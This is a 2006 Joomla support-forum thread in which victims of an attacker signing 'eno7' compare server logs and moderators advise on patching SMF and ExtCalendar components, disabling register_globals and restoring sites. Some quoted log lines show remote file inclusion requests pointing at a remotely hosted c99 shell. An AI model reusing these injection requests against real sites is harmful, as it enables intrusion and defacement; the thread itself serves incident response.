Joomla! • View topic - Joomla/MamboHacked Sites By eno7

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Forum rules

Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.

Joomla/MamboHacked Sites By eno7

Moderators: lafrance, mandville, General Support Moderators

Page 1 of 2

[ 35 posts ]

Go to page 1, 2 Next

Print view

Previous topic | Next topic

Author

Message

Maggles

Post subject: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:01 pm

Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7

I had a look here:

http://www.zone-h.org/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?

Top

Mike G.

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:07 pm

Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5

We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike

Top

Maggles

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:19 pm

Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7

Mike G. wrote:

We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike

We used to have a phpBB forum but changed it to vBulletin about a year ago but there is still a phpbb component installed - my other half is the techie and he did tell me why at the weekend that we can't remove it but I can't remember why right now - I went though removing all components and modules that we don't need/use and removed them as well as updated any to the latest versions etc... and my other half has tried changing settings to make it even more secure but he still got to the site for a second time. Im just glad we take regular backups and save them elsewhere.

Top

RobS

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:28 pm

Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA

@Maggles,

I have sent you a Personal Message.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

Top

Maggles

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:30 pm

Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7

RobS wrote:

@Maggles,

I have sent you a Personal Message.

Thanks, I've emailed you to the address you supplied.

Top

infograf768

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 1:49 pm

Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 16630
Location: **Translation Matters**

Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group

Top

Mike G.

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 2:04 pm

Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5

The attack to our site came from 81.213.180.37, also a turkish site.

As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!

CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omited - ChiefGoFor] and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.

Regards,

Mike

Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.

Top

LorenzoG

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 2:13 pm

Joomla! Virtuoso

Joined: Fri Aug 19, 2005 8:46 am
Posts: 3011
Location: Stockholm, Sweden

Warning, above link contains a trojan virus script .. as adviced by the poster

_________________
Industributik - http://www.industributiken.se

Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.

Top

Mike G.

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 3:36 pm

Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5

Hmm ... but it might be helpful for other users to know what to search in their logfiles .... $:-\$

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.

Regards,

Mike

Top

ChiefGoFor

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 4:05 pm

Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5205
Location: Omaha, Nebraska, USA

Mike G. wrote:

I agree with you. It was kind of a catch 22 there. Your solution for seaching for those key terms is great! Thank you for the information.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559

Top

RobS

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 4:11 pm

Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA

Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.

Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.

Top

CiPHeR

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:16 pm

Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa

Our site also got hacked this weekend by this same Eno7 guy - his page over writes your configuration.php file - how do we prevent this from happening again... this is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla powered sites? Everything in our root folder of our site is read only, so how did this happen?

Thanks

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

Top

ChiefGoFor

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:26 pm

Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5205
Location: Omaha, Nebraska, USA

To my knowedge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think your case, the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.

Top

anna.y

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:38 pm

Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57

What are the practical steps to restore the website. We've just been hacked through SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then what are the practical steps to prevent it from recurring

Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.

Top

infograf768

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:45 pm

Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 16630
Location: **Translation Matters**

Concerning SMF
http://forum.joomla.org/index.php/topic,76520.0.html

Top

anna.y

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:52 pm

Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57

Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

Top

CiPHeR

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 3:32 pm

Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa

Thanks...

One question... will that fix prevent this clown from doing this again?

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

Top

kolle

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 9:22 am

Joomla! Apprentice

Joined: Tue Aug 30, 2005 1:19 pm
Posts: 10
Location: Hamburg

CiPHeR wrote:

One question... will that fix prevent this clown from doing this again?

i´d love to know that!
anybody.. :-*

Top

zomertje

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 3:57 pm

Joomla! Apprentice

Joined: Sun Jul 09, 2006 10:41 am
Posts: 17

Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

If it comes from the same place
Or disable the component and upgrade

Top

Peter Koch

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 5:42 pm

Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374

zomertje wrote:

Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

That wont help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IP's of that provide. In case you need them PM me and I will send you the whole range.

Top

anna.y

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 2:25 am

Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57

CiPHeR wrote:

Thanks...

One question... will that fix prevent this clown from doing this again?

Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

Top

rliskey

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 3:07 am

Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway

I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.

Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com

Top

rliskey

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 5:28 am

Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway

Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com

Top

infograf768

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 6:39 am

Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 16630
Location: **Translation Matters**

using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK

Top

CiPHeR

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 12:00 pm

Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa

anna.y wrote:

CiPHeR wrote:

Thanks...

One question... will that fix prevent this clown from doing this again?

I dont know why all hosts DONT have register globals=OFF!

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

Top

Elpie

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 12:16 pm

Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903

CiPHeR wrote:

I dont know why all hosts DONT have register globals=OFF!

register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or dont ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

Top

anna.y

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 4:56 pm

Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57

infograf768 wrote:

I got hacked through older version of com_SMF and deleting all root files and re-installing everything was NOT an option.

All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and as I said despite hundreds attempts of hacking I'm having no further problems (keeping my fingers crossed isprobably helping as well...

)

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

Top

omlex

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Wed Aug 09, 2006 8:17 am

Joomla! Fledgling

Joined: Wed Aug 09, 2006 8:13 am
Posts: 3

How he able to alter the MYSQL db?

Top

berlin

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Aug 14, 2006 2:46 am

Joomla! Intern

Joined: Thu Sep 01, 2005 5:41 am
Posts: 76

rliskey wrote:

I was hacked by a turkish hacker today.

[

Code:

14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found
 in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97

i don't know why it shows turx.nl is extcalendar the culprit?

_________________
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand

Top

infograf768

Post subject: Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Aug 14, 2006 6:13 am

Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 16630
Location: **Translation Matters**

What you are posting looks like the error log and not the raw logs.

Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.

Top

Page 1 of 2

[ 35 posts ]

Go to page 1, 2 Next

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 2 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:

Welcome to Joomla!

Recent Joomla! News

Support Joomla!

What Is Joomla?

Joomla! for Business

Joomla! for Developers

Learn more about Joomla!

Connect!

Support!

Read!

Get involved with Joomla!

Directories

Developers

Download Joomla! 2.5

Download Joomla! 3.1

Getting Started with Joomla!

Internationalization

The Joomla! Forum ™

Forum rules

Joomla/MamboHacked Sites By eno7

Who is online